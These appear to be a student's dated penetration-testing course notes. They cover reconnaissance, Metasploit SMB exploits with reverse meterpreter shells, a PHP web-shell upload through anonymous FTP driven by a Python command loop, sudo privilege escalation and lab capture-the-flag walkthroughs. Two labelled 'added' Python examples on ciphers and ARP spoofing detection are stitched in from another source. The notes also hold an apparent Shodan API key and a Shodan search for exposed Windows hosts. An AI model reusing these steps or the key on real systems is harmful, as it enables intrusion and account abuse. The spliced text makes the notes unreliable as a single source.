=============================================================================================
=============================================================================================
09.01.2019
pen test?
before pen test
- understanding OSes (not only Windows and Linux)
services
- vector of attack
methods of attack
red team - find vulnerabilities
blue team - fix vulnerabilities
purple testing - mixed
pen test... means capture the flag
white box
black box
grey box
scada systems
aurora generator
stage zero - understand the needs of that business
passwd, shadow
sudo unshadow /etc/passwd /etc/shadow
crack hash
--------
ftp, http 8080
vector of attack: anonymous login on ftp
vsftpd 2.3.4 - Backdoor Command Execution
upload a shell script
hide the file
ls command, find the file
-----------------------------
msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > show options
msf5 auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 172.16.60.142
msf5 auxiliary(scanner/smb/smb_enumshares) > set THREADS 10
msf5 auxiliary(scanner/smb/smb_enumshares) > run
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set SMBUser
msf5 auxiliary(scanner/smb/smb_login) > set SMBPass
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 172.16.60.1/24
msf5 auxiliary(scanner/smb/smb_login) > set THREADS 30
msf5 auxiliary(scanner/smb/smb_login) > run
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set SMBUser
msf5 exploit(windows/smb/psexec) > set SMBPass
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set LHOST 172.16.65.132
msf5 exploit(windows/smb/psexec) > set RHOST 172.16.60.73
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 172.16.60.87
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 172.16.60.77
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
bitsadmin
certutil
=============================================================================================
=============================================================================================
06.02.2019
OSCP cert
CEH cert
CTF Capture the flag
cissp certification
Topic:
misconfiguration
bad habits
leaving paths, e.g. /var/www/html - public folder
/etc/apache2 - Apache config
vulnerability: wrongly configured file permissions
https://dokuwiki.pejaime.com/lib/exe/fetch.php?media=dardan:f5:ms17-010-eternalblue7-2.pdf
=============================================================================================
=============================================================================================
08.02.2019
nmap -sU -p 161 172.16.15.15
snmpwalk -v1 -c public <target ip>
msf5 > use auxiliary/scanner/snmp/snmp_enum
msf5 > use auxiliary/scanner/snmp/snmp_enumshares
msf5 > use auxiliary/scanner/snmp/snmp_enumusers
msf5 > use auxiliary/scanner/snmp/cisco_config_tftp
msf5 > use auxiliary/scanner/snmp/cisco_upload_file
=============================================================================================
=============================================================================================
11.02.2019
Information Gathering
Passive
most important process of hacking
through 3rd parties; going directly is not recommended
-whois, tool and database
-archive.org
-theHarvester
-recon-ng
-job portals, get info about systems from job descriptions
-google hack
Active
-dumpster diving
-google hack (dorks)
-dns recon, gets the domain from an IP
-shodan
-----------------------------
domain
subdomain *domain
extension .com .net
-----------------------------
Phase 2
direct
Vector of Attack
# pip2 install shodan
www.shodan.io
register on shodan.io with a temp mail
root@kali:~# shodan init ygxXXC1rOzk2VhqpzkmIWKHcR0Xypu2H
in the shodan.io search:
country:"al" port:"445" os:"windows"
search with IP
ISP:"Kujtesa"
shodan cli:
# shodan host 84.22.59.42
----------------------------------------------------------------
Weevely
Usage
weevely generate <password> <path>
weevely <URL> <password> [cmd]
Description
# git clone https://github.com/epinna/weevely3.git
/weevely3# python weevely.py generate 123 ~/Desktop/tt.py
mv tt.py to /var/www/html
python weevely.py http://172.16.65.98/
# scp file.php user@ip.65.98:/home/userhome/ ### transfer kali to ubuntu apache2 server
=============================================================================================
=============================================================================================
13.02.2019
OSINT Frameworks
https://osintframework.com/
Information Gathering
domain: ickosovo.com
Red Hawk
Th3inspector
BadKarma - Advance Network Reconnaissance Toolkit
DMitry - Deepmagic Information Gathering Tool
Devploit - Information Gathering Tool
https://www.geocreepy.com/
=============================================================================================
=============================================================================================
18.02.2019
nessus scan
dradis - upload the exported Nessus db to generate reports
http://localhost:3000
cat file.csv | grep "172.16.1" | cut -d "," -f 5 | sort -u
nmap -p- -iL filename --- to scan from a list
nmap -iL filename --exclude 172.16.1.204 --- to exclude from the result
nmap -p- ip/24 >> scan_result
nmap -p 21,22,23 ip/24 >> scan_result --- specific scan
nmap -p- 172.16.1.19 --- 554 rtsp found, install vlc
Metasploit https://localhost:3790/
asdf 12345@tmp
=============================================================================================
=============================================================================================
20.02.2019
to identify file "what"
target 172.16.65.165
$ strings what ### to understand if it is an archive
hint1: formula for tnt
# gzip what
$ gzip -d what.gz
$ file what
what: OpenDocument Text
=============================================================================================
=============================================================================================
22.02.2019
Cryptography
==SYMMETRIC==
scytale of Sparta
symmetric = encrypt and decrypt with the same key
Kerckhoffs - security even when the algorithm is known, e.g. RSA, AES; the key is what stays secret
## substitution ciphers --- need to know the logic/algorithm of the table: a -> k, b -> d, c -> n
AES-256 = quantum proof, would take millions of years
-----------------------------------------------------
## letter frequency analysis
E 13%
T 9%
A 8%
QU
-----------------------------------------------------
## Caesar cipher - shift of ABCDEF...XYZ
-----------------------------------------------------
## Affine cipher - plus a multiplier: E(x) = (Ax + B) mod 26, Euclidean algorithm
-----------------------------------------------------
## vigenere ciphers
-----------------------------------------------------
## stream cipher & block cipher
stream cipher: encrypts bits
A5/1, RC4
TRNG, PRNG
middle square, seed =
### block cipher: encrypts blocks
DES - 16 rounds and key whitening
Shannon (confusion ^ diffusion)
AES, ECB, CBC
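Added worked example (not from these course notes): the affine cipher E(x) = (Ax + B) mod 26 from the notes above, with the modular inverse of A found by the extended Euclidean algorithm, and the letter-frequency idea (E is the most common English letter) used to recover a Caesar shift, which is the A = 1 special case. The key values and sample plaintexts are made up for the demonstration.

```python
# Added example, not from the course notes: affine cipher E(x) = (A*x + B) mod 26,
# modular inverse via the extended Euclidean algorithm, and a frequency attack on
# the Caesar case. Keys and plaintexts below are constructed for the demo.
from collections import Counter
import string

ALPHABET = string.ascii_uppercase
M = 26


def egcd(a, b):
    """Extended Euclidean algorithm: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x1, y1 = egcd(b, a % b)
    return g, y1, x1 - (a // b) * y1


def mod_inverse(a, m=M):
    """Inverse of a modulo m; raises if gcd(a, m) != 1, i.e. the cipher cannot be undone."""
    g, x, _ = egcd(a % m, m)
    if g != 1:
        raise ValueError(f"{a} has no inverse mod {m}; A must be coprime to 26")
    return x % m


def affine_encrypt(plaintext, a, b):
    """E(x) = (A*x + B) mod 26 on letters; other characters pass through unchanged."""
    mod_inverse(a)  # reject keys that could never be decrypted
    out = []
    for ch in plaintext.upper():
        if ch in ALPHABET:
            x = ALPHABET.index(ch)
            out.append(ALPHABET[(a * x + b) % M])
        else:
            out.append(ch)
    return "".join(out)


def affine_decrypt(ciphertext, a, b):
    """D(y) = A^-1 * (y - B) mod 26, the inverse of affine_encrypt."""
    a_inv = mod_inverse(a)
    out = []
    for ch in ciphertext.upper():
        if ch in ALPHABET:
            y = ALPHABET.index(ch)
            out.append(ALPHABET[(a_inv * (y - b)) % M])
        else:
            out.append(ch)
    return "".join(out)


def letter_frequencies(text):
    """Relative frequency of each letter A..Z in the text (non-letters ignored)."""
    letters = [c for c in text.upper() if c in ALPHABET]
    counts = Counter(letters)
    total = len(letters) or 1
    return {c: counts[c] / total for c in ALPHABET}


def guess_caesar_shift(ciphertext):
    """Assume the most frequent ciphertext letter is the image of E (~13% in English)."""
    freqs = letter_frequencies(ciphertext)
    most_common = max(freqs, key=freqs.get)
    return (ALPHABET.index(most_common) - ALPHABET.index("E")) % M


if __name__ == "__main__":
    ct = affine_encrypt("meet me at the gate", 5, 8)
    print(ct, "->", affine_decrypt(ct, 5, 8))
    shifted = affine_encrypt("everyone here needs the secret key sent before three", 1, 3)
    print("recovered Caesar shift:", guess_caesar_shift(shifted))
```

The frequency guess only works once the ciphertext is long enough for E to dominate; on a short message the most common letter may be T or A, which is why a real attack scores all 26 shifts against the full frequency table instead of trusting a single letter.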
=============================================================================================
=============================================================================================
25.02.2019
/var/log/proftpd# tail -f /var/log/proftpd.log --- real time log
/var/log/apache2# tail -f access.log
iptables -L --line-numbers --- view by line
iptables -D INPUT 3 --- to delete a line
iptables -A INPUT -s 172.16.65.153 -p tcp --destination-port 80 -j DROP --- to add a rule
iptables -D INPUT -s 172.16.65.153 -p tcp --destination-port 80 -j DROP --- to delete a rule
# netstat -naop | grep ESTABLISHED
# kill -9 1475
# lsof -n -i --- view all connections
arp -a --- to see the IPs; IPs have been changed, IPs are cloned, our IPs
screen --- the process was hijacked
ssh user@ip
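Added example (not from these notes) for the arp -a check above: parse neighbour-table output and flag a MAC address that answers for more than one IP, which is how a cloned or spoofed IP shows up on the defender's side. The ARP lines are constructed sample input; the IPs reuse the lab range from the notes.

```python
# Added example, not from the course notes: read `arp -a` style output and report
# any MAC that is claimed by more than one IP. SAMPLE_ARP is constructed input.
import re
from collections import defaultdict

# Constructed sample: the gateway's MAC also appears behind a second IP.
SAMPLE_ARP = """\
? (172.16.65.1) at 00:50:56:c0:00:08 [ether] on eth0
? (172.16.65.153) at 00:0c:29:3a:1f:9e [ether] on eth0
? (172.16.65.136) at 00:0c:29:77:2b:10 [ether] on eth0
? (172.16.65.98) at 00:50:56:c0:00:08 [ether] on eth0
? (172.16.65.200) at <incomplete> on eth0
"""

# Matches "(ip) at aa:bb:cc:dd:ee:ff"; '<incomplete>' rows do not match and are skipped.
ARP_LINE = re.compile(r"\((?P<ip>[\d.]+)\) at (?P<mac>[0-9a-f:]{17})", re.IGNORECASE)


def parse_arp(output):
    """Return {ip: mac} for every complete ARP entry in the command output."""
    table = {}
    for line in output.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_cloned_macs(table):
    """Return {mac: [ips]} for MACs that answer for more than one IP address."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    for mac, ips in find_cloned_macs(parse_arp(SAMPLE_ARP)).items():
        print(f"{mac} answers for {', '.join(ips)}")
```

A single MAC behind several IPs is also what a router or a multi-homed host looks like, so a hit is something to compare against the known gateway and host list, not proof of spoofing on its own.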
=============================================================================================
=============================================================================================
27.02.2019
Target
172.16.65.136
# nmap 172.16.65.136
21/tcp open ftp
22/tcp open ssh
80/tcp open http
# nmap -sV 172.16.65.136
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
21/tcp open ftp ProFTPD 1.3.5e
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
# dirb http://172.16.65.136
msf > search ProFTPD 1.3.5e
# cd /usr/share/webshells/php/
root@kali:/usr/share/webshells/php# cp simple-backdoor.php dani.php
# ftp 172.16.65.136
user/pass:anonymous/anonymous
ftp> cd /var/www/html/
ftp> put dani.php
http://172.16.65.136/dani.php
http://172.16.65.136/dani.php?cmd=<command we want to execute>
nano ftp.py
# Python 3 version of the loop from the notes: read a command, send it as the
# cmd parameter, print the response body.
import requests

while True:
    cmd = input("> ")
    r = requests.get("http://172.16.65.136/simple-backdoor.php?cmd={}".format(cmd))
    print(r.text)
python ftp.py 172.16.65.136
$ ssh anonymous:anonymous@172.16.65.136
anonymous@digitalschool:/home/drinor$ cat .bash_history
$ ssh drinor:Retro1@172.16.65.136
$ sudo su
[sudo] password for drinor:Retro1
root@digitalschool:/home/drinor# :)
=============================================================================================
=============================================================================================
01.03.2019
LAB: hosts to try hacking
=============================================================================================
=============================================================================================
04.03.2019
Build AdminFinder.py
Wget.py / cget.exe
we got access
keep persistence
only 22 open
what to do
add user
useradd / does not create a home dir
/passwd
they have /home, they don't have /bin/bash
---------------------------------------
Backdoors|malware for specific systems:
-/usr/share/webshells/: asp aspx cfm jsp perl php
-
$ service apache2 status
---------------------------------------
web media files
how to automate getting all the files at once
>>> wget.download('http://127.0.0.1/all.zip')
=============================================================================================
=============================================================================================
06.03.2019
Build Utilman
=============================================================================================
=============================================================================================
11.03.2019
exam complexity:
recruit --- level 1
Flag on 10.20.20.13 via smb
CA1{7SEkYLPrxEdvRcR}
=============================================================================================
=============================================================================================
Final EXAM
Saturday 27.04 at 10, Sunday 28.04 at 9:59
lab - complexity for 24 hours
10 - 11 machines
pivoting
web
"no support from each other"
before exam: study before the exam, set up machine and tools
johntheripper -- be sure it is the latest version
=============================================================================================
=============================================================================================
15.03.2019
Target: 65.136
mkdir Voyager
Files
nmap 172.16.65.136 -p- # only open ports
nmap -sS -sV -p22,80,2020 172.16.65.136
--- results here ---
http://172.16.65.136:2020
method not allowed
http://172.16.65.136
there is a photo, mmmm
view source code - nothing :(
there is a directory
dirb or gobuster --- nothing, only the image folder
http://172.16.65.136/img ----- there are some imgs
mkdir img
wget http://172.16.65.136/img/1.jpeg, 2.jpeg, 3.jpeg --- to download
steghide info 1.jpg
steghide info 2.jpg --- mm there is something in it
steghide extract -sf 2.jpg --- to extract
# ls --- there is a .py file extracted
nano voyager.py
Flask --- lib is in there
accepts POST requests
requester needs to send an image/file
18:42:46 --- commenting voyager.py
id
ps -aux
LinEnum
2 users
john
bon
base64 /home/john/cred -w 0 --- to get the file
base64 decode
# file cred
cred: OpenDocument cred
# libreoffice cred
requires a password
johntheripper is used here
john.pot --- here are the ones already cracked once
# sudo ./john xxx
finds the password of cred
try that user and pass on the web login
ssh john@172.16.65.136
nano voyager.conf
sudo -l
sudo /usr/bin/lib/
IDS bypass scan methods:
idle scan
fragmented scan
IDS notices the nmap scan
DT - deception technology, e.g. honeypot
snort - IDS
Splunk - log aggregator, plus pattern builder
Elasticsearch --- runs on a NoSQL database, very fast
AlienVault
Carbon Black
Cylance
endpoint protection
- on cloud
- scalability
- quarantine the infected host
=============================================================================================
=============================================================================================
20.03.2019
sudo tcpdump net 10.0.20.0/24 -w logs.txt
Target: 172.16.65.123
nmap 172.16.65.123
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-20 12:53 EDT
Nmap scan report for 172.16.65.123
Host is up (0.0099s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5357/tcp  open  wsdapi
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
=============================================================================================
=============================================================================================
25.03.2019
target
172.16.65.73
nmap 172.16.65.73
nmap -sS -sV -p80 172.16.65.73
dirb http://172.16.65.73
echo xxxxxxx | base64 -d
http://172.16.65.73/armageddon --- gives us a private key
nano ssh-key --- paste the key
chmod 600 ssh-key
ssh -i ssh-key armageddon@172.16.65.73
> :)
# sudo -l
User armageddon may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/python
nano shell.py
import os
os.system('sudo su')
# sudo /usr/bin/python shell.py
# root :)
=============================================================================================
=============================================================================================
27.03.2019
Build netcat with malware included which will provide a session
=============================================================================================
=============================================================================================
29.03.2019
snmpwalk
nikto
wpscan
creddump
smbrelay
netntlmex.py
fingerprint.py
impacket
pth
load incognito --- command
proxychains socks4a
dex2jar, apktool, apksign
tcpdump, wireshark
curl_user --- local exploit
ms12_020 --- exploit rdesktop
folder/file sharing
domain hashdump via shadow copy
concept: dll injection with msfvenom
malicious dll
subdomain bruteforce with wisler
cloudflare bypass
nslookup, reverse lookup
domain queries with the net command
fileless attacks with regsvr32
serveo.net port forwarding
sshuttle port forwarding
plink port forwarding
sshuttle tunneling
plink ssh tunnel
burp captcha bypass
sql injection with sqlmap, cmd through sqlmap
event log cleaner
alternate data stream
cron jobs, task schedule, reg add
obfuscation
base32/64 encode decode
esbsb encryption decryption
steghide with the whole package
pop3 brute force
snmp public and private string bruteforce
xhydra, hydra, medusa, ncrack
netcat and nc file transfer
netcat and nc bypass uac
ask injection
local exploits (metasploit)
autoroute and static route
reverse engineering: Immunity Debugger, OllyDbg
ransomware: symmetric encryption, reverse ransomware
local authentication bypass: cmd stickykey injection, linux init injection
show mount (metasploit)
enum filezilla_server, enum outlook, enum skype
export firefox history and data
export chrome history and data
decrypt saved password
privilege escalation with wget
privilege escalation with cat
privilege escalation with vim and vi
privilege escalation with python hooks
privilege escalation with pip
privilege escalation with find
kernel exploit
gcc compiler, g++ compiler
uncompyle6
apache virtual host, nginx, mod_ssl, mod_security
php shell, perl shell, asp/aspx shell
weevely 3
smbclient
finger protocol
smtp relay
thc ipv6 attack
thc ssl attack
slowloris, slowhttptest
pyinstaller, wine32/64, golang
metasploit persistence
bitsadmin, powershell url download, certutil, unicorn
etherape, promiscuous mode
macchanger, big mac attack
rogue access point
iot default creds
rtsp access with vlc
johntheripper, hashcat
wordpress bruteforce with hashcat mode -m 400 and -m 500
joomlascan --- tool
drupal enumeration
